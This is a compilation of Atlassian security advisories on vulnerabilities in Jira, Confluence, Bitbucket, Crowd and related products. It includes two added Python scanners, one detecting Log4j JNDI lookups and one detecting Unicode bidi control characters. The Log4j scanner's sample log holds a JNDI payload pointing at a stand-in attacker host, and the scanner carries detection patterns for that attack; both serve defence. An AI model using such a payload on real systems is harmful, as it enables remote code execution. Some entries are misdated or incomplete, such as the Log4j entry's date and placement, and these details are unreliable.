Atlassian Security Updates (CVE)

February 2023

Atlassian rates the severity level of this vulnerability as critical.

Information

Git Buffer Overflow in Multiple Products.

Affected products

  • Bitbucket Server and Data Center

  • Bamboo Server and Data Center

  • Fisheye

  • Crucible

  • Sourcetree

 

January 2023

Atlassian rates the severity level of this vulnerability as critical.

Information

This advisory discloses a critical severity security vulnerability which was introduced in version 5.3.0 of Jira Service Management Server and Data Center. The following versions are affected by this vulnerability:

  • 5.3.0

  • 5.3.1

  • 5.3.2

  • 5.4.0

  • 5.4.1

  • 5.5.0

An authentication vulnerability was discovered in Jira Service Management Server and Data Center which allows an attacker to impersonate another user and gain access to a Jira Service Management instance under certain circumstances. With write access to a User Directory and outgoing email enabled on a Jira Service Management instance, an attacker could gain access to signup tokens sent to users with accounts that have never been logged into. Access to these tokens can be obtained in two cases:

  • If the attacker is included on Jira issues or requests with these users, or

  • If the attacker is forwarded or otherwise gains access to emails containing a “View Request” link from these users.

Bot accounts are particularly susceptible to this scenario. On instances with single sign-on, external customer accounts can be affected in projects where anyone can create their own account.

Affected products

  • Jira Service Management Server

  • Jira Service Management Data Center

 

November 2022

Atlassian rates the severity level of this vulnerability as critical.

Information

This advisory discloses a critical-severity security misconfiguration vulnerability, which was introduced in Crowd 3.0.0. All versions released after 3.0.0 are affected but only if both of the following conditions are met:

  • The vulnerability concerns only new installations of affected versions: if you upgraded from an earlier version, for example version 2.9.1, to version 3.0.0 or later, your instance is not affected.

    • A new installation is an instance of Crowd that is still the same version you originally downloaded from the downloads page and has not been upgraded since.

  • An IP address has been added to the Remote Address configuration of the crowd application (which is empty by default in versions after 3.0.0).

The vulnerability allows an attacker connecting from an IP address in the allow list to authenticate as the crowd application by bypassing a password check. This would allow the attacker to call privileged endpoints in Crowd’s REST API under the usermanagement path.

Affected products

  • Crowd Server and Data Center
 

Atlassian rates the severity level of this vulnerability as critical.

Information

This advisory discloses a critical severity security vulnerability introduced in version 7.0.0 of Bitbucket Server and Data Center. The following versions are affected by this vulnerability:

  • Bitbucket Data Center and Server 7.0 to 7.21

  • Bitbucket Data Center and Server 8.0 to 8.4 if mesh.enabled is set to false in bitbucket.properties

There is a command injection vulnerability using environment variables in Bitbucket Server and Data Center. An attacker with permission to control their username can exploit this issue to execute code on the system.

Affected products

  • Bitbucket Server

  • Bitbucket Data Center

 

August 2022

A critical-severity command injection vulnerability was released on 24 Aug 2022.

Information

This advisory discloses a critical-severity security vulnerability which was introduced in version 7.0.0 of Bitbucket Server and Data Center. All versions released after 6.10.17, including 7.0.0 and newer, are affected; this means that all instances running any version between 7.0.0 and 8.3.0 inclusive are affected by this vulnerability.

There is a command injection vulnerability in multiple API endpoints of Bitbucket Server and Data Center. An attacker with access to a public repository or with read permissions to a private Bitbucket repository can execute arbitrary code by sending a malicious HTTP request.

Affected products

All versions of Bitbucket Server and Data Center released after 6.10.17, including 7.0.0 and newer, are affected; this means that all instances running any version between 7.0.0 and 8.3.0 inclusive are affected by this vulnerability.
 

July 2022

This vulnerability was released on 20 Jul 2022, should be remediated on affected systems immediately, and has already been updated.

Information

A Servlet Filter is Java code that intercepts and processes HTTP requests before a client request is sent to a back end resource. They’re also used to intercept and process HTTP responses from a back end resource before they’re sent to a client. Some Servlet Filters provide security mechanisms such as logging, auditing, authentication, or authorization.

Affected products

  • Bamboo Server and Data Center
  • Bitbucket Server and Data Center
  • Confluence Server and Data Center
  • Crowd Server and Data Center
  • Fisheye and Crucible
  • Jira Server and Data Center
  • Jira Service Management Server and Data Center
 

This vulnerability was released on 20 Jul 2022, should be remediated on affected systems immediately, and has already been updated.

Information

When the Questions for Confluence app is enabled on Confluence Server or Data Center, it creates a Confluence user account with the username disabledsystemuser. This account is intended to aid administrators that are migrating data from the app to Confluence Cloud. The disabledsystemuser account is created with a hardcoded password and is added to the confluence-users group, which allows viewing and editing all non-restricted pages within Confluence by default. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access any pages the confluence-users group has access to.

Affected products

Questions For Confluence app for:

  • Confluence Server
  • Confluence Data Center
 

June 2022

This advisory, released on June 29, 2022, discloses a high-severity security vulnerability that has already been updated.

Information

A full-read server-side request forgery exists in Mobile Plugin for Jira, which is bundled with Jira and Jira Service Management. It is exploitable by any authenticated user (including a user who joined via the sign-up feature). It specifically affects the batch HTTP endpoint used in Mobile Plugin for Jira. It is possible to control the HTTP method and location of the intended URL through the method parameter in the body of the vulnerable endpoint.

Affected products

  • Jira Core Server
  • Jira Software Server
  • Jira Software Data Center
  • Jira Service Management Server
  • Jira Service Management Data Center

Jira versions after 8.0 and before 8.13.22, and Jira Service Management versions after 4.0 and before 4.13.22.
 

A new ‘Critical’ vulnerability was released on June 2, 2022 and has already been updated.

Information

Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. 

Affected products

  • All versions of Confluence Server and Data Center prior to the fixed versions listed above are affected by this vulnerability.

A new ‘High’ vulnerability was released on November 1, 2021.

Information

Multiple Atlassian products use the third-party Log4j library, which is vulnerable to CVE-2021-44228:

Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
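The CVE text above names the trigger: a logged string that contains Log4j lookup syntax is substituted, and a JNDI lookup inside it reaches out to an attacker-controlled server. As an added example (not Atlassian's code or tooling; the access-log lines are constructed with documentation addresses and hostnames), here is a small Python pass over request logs that flags the `${jndi:` syntax and, at a lower tier, any other `${...}` lookup syntax arriving in request fields, which is a cheap first-pass detection to run while patching:

```python
"""Flag Log4j 2 lookup syntax in attacker-influenced log fields.

Added example (not Atlassian code): CVE-2021-44228 fires when a logged
string containing a ${jndi:...} lookup is substituted, so request logs
are a natural place to look for attempts.
"""
import re

# A JNDI lookup: "${jndi:" (whitespace and case variations tolerated).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Any Log4j lookup syntax "${...}" in a request field; rarely legitimate
# in a URL or User-Agent and worth a second look.
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")


def classify(line):
    """Return 'jndi-lookup', 'lookup-syntax' or None for one log line."""
    if JNDI_LOOKUP.search(line):
        return "jndi-lookup"
    if ANY_LOOKUP.search(line):
        return "lookup-syntax"
    return None


def scan_log(lines):
    """Return (line_number, verdict) for every line containing lookup syntax."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((lineno, verdict))
    return hits


# Constructed access-log lines in combined log format. Addresses and the
# "attacker.example" host are documentation placeholders, not real indicators.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:01:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:02:15 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 300 "-" "curl/7.79.1"',
    '203.0.113.5 - - [10/Dec/2021:10:03:00 +0000] "GET /price?amount=12 HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, verdict in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {verdict}")
```

The two tiers are deliberate: a `${jndi:` hit is worth an immediate look, while generic lookup syntax in request data is noisy enough that it belongs in a review queue rather than an alert. Pattern matching on logs is only a first pass; the fix the advisory points to is upgrading the library, and a JNDI lookup that did resolve would also show up as an outbound LDAP or RMI connection from the application host.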

Affected products

  • Bitbucket

November 2021

A new ‘High’ vulnerability was released on November 1, 2021.

Severity

Atlassian rates the severity level of this vulnerability as high, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Affected products

  • Bamboo Server and Data Center

  • Bitbucket Server and Data Center

  • Confluence Server and Data Center

  • Crucible

  • Fisheye

  • Jira Service Management Server and Data Center (and Insight Asset Management app)

  • Jira Software Server and Data Center (including Jira Core)

  • Jira and Confluence Server mobile apps

Description

A vulnerability has been identified affecting multiple Atlassian products where special characters, known as Unicode bidirectional override characters, are not rendered or displayed in the affected applications. These special characters are typically not displayed by the browser or code editors but can affect the meaning of the source code when it is processed by a compiler or an interpreter.
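As an added illustration of the description above (this is not Atlassian's code or tooling, and the sample source text is constructed), here is a small Python scanner that reports bidirectional control characters in source text, flags lines where an override or isolate is opened but never closed, and offers a stripping step for files that should contain no such characters:

```python
"""Scan source text for Unicode bidirectional control characters.

Added example (not Atlassian code): reports the override, embedding and
isolate characters the advisory describes, which editors and browsers may
not render but compilers and interpreters still process.
"""

# Bidi controls that can reorder how a line is displayed.
BIDI_CONTROLS = {
    "\u202A": "LRE",  # left-to-right embedding
    "\u202B": "RLE",  # right-to-left embedding
    "\u202C": "PDF",  # pop directional formatting (closes LRE/RLE/LRO/RLO)
    "\u202D": "LRO",  # left-to-right override
    "\u202E": "RLO",  # right-to-left override
    "\u2066": "LRI",  # left-to-right isolate
    "\u2067": "RLI",  # right-to-left isolate
    "\u2068": "FSI",  # first-strong isolate
    "\u2069": "PDI",  # pop directional isolate (closes LRI/RLI/FSI)
    "\u200E": "LRM",  # left-to-right mark
    "\u200F": "RLM",  # right-to-left mark
    "\u061C": "ALM",  # Arabic letter mark
}
EMBEDDING_OPENERS = {"\u202A", "\u202B", "\u202D", "\u202E"}
ISOLATE_OPENERS = {"\u2066", "\u2067", "\u2068"}


def find_bidi_controls(source):
    """Return (line, column, name, codepoint) for every bidi control in source."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                findings.append((lineno, col, BIDI_CONTROLS[ch], f"U+{ord(ch):04X}"))
    return findings


def unterminated_lines(source):
    """Lines where an embedding/override or isolate is opened but not closed
    before the line ends, so the rendered order diverges from the parsed order."""
    bad = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        emb = iso = 0
        for ch in line:
            if ch in EMBEDDING_OPENERS:
                emb += 1
            elif ch == "\u202C":
                emb = max(0, emb - 1)
            elif ch in ISOLATE_OPENERS:
                iso += 1
            elif ch == "\u2069":
                iso = max(0, iso - 1)
        if emb or iso:
            bad.append(lineno)
    return bad


def strip_bidi_controls(source):
    """Remove all bidi controls. Suitable for source files; not for data
    that legitimately contains right-to-left text."""
    return "".join(ch for ch in source if ch not in BIDI_CONTROLS)


# Constructed sample: line 2 hides an RLO (U+202E) and a PDI (U+2069) inside a
# comment. A renderer may display the comment text reordered; the interpreter
# sees the raw characters in file order.
SAMPLE_SOURCE = (
    "def withdraw(balance, amount):\n"
    "    balance -= amount  # \u202Eif amount > 0\u2069\n"
    "    return balance\n"
)

if __name__ == "__main__":
    for lineno, col, name, cp in find_bidi_controls(SAMPLE_SOURCE):
        print(f"line {lineno} col {col}: {name} ({cp})")
    print("unterminated on lines:", unterminated_lines(SAMPLE_SOURCE))
```

Running the scanner over the constructed sample reports both controls on line 2 and lists that line as unterminated, because the RLO is never closed by a PDF. A practical deployment runs this as a pre-receive or CI check on code and configuration files, where bidi controls have no legitimate use, and treats any finding as a review blocker rather than a warning.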

Acknowledgements

The issue was identified and reported by Nicholas Boucher and Ross Anderson of the University of Cambridge. 

 

October 2021

A new ‘Critical’ vulnerability was released on 20th Oct 2021.

Severity

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate, or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Affected products

  • Insight – Asset Management app

  • Jira Service Management Data Center and Server

Description

Insight – Asset Management has a feature to import data from several databases (DBs). One of these DBs, the H2 DB, has a native function in its library which an attacker can use to run code on the server (remote code execution a.k.a. RCE). The H2 DB is bundled with Jira to help speed up the setup of Jira test environments.

The combination of the DB import feature introduced by Insight – Asset Management with the existing Jira H2 DB library exposed this vulnerability. The vulnerability exists whether or not the import configuration was saved and even if H2 was never used as a targeted DB. Accessing this vulnerability requires the following:

  • The user must be an authenticated Jira user, AND

  • The user has either of the following privileges within Insight – Asset Management:

    • user or group permission to “Insight administrator”

    • user or group permission to “Object Schema Manager”

August 2021

A new ‘Critical’ vulnerability was released on 25th August 2021.

Severity

This vulnerability is being actively exploited in the wild.
Affected servers should be patched immediately.

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Affected products

  • Confluence Server

  • Confluence Data Center

Description

An OGNL injection vulnerability exists that would allow an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. 

All versions of Confluence Server and Data Center prior to the fixed versions listed above are affected by this vulnerability.

Acknowledgements

The issue was discovered by Benny Jacob (SnowyOwl) via the Atlassian public bug bounty program.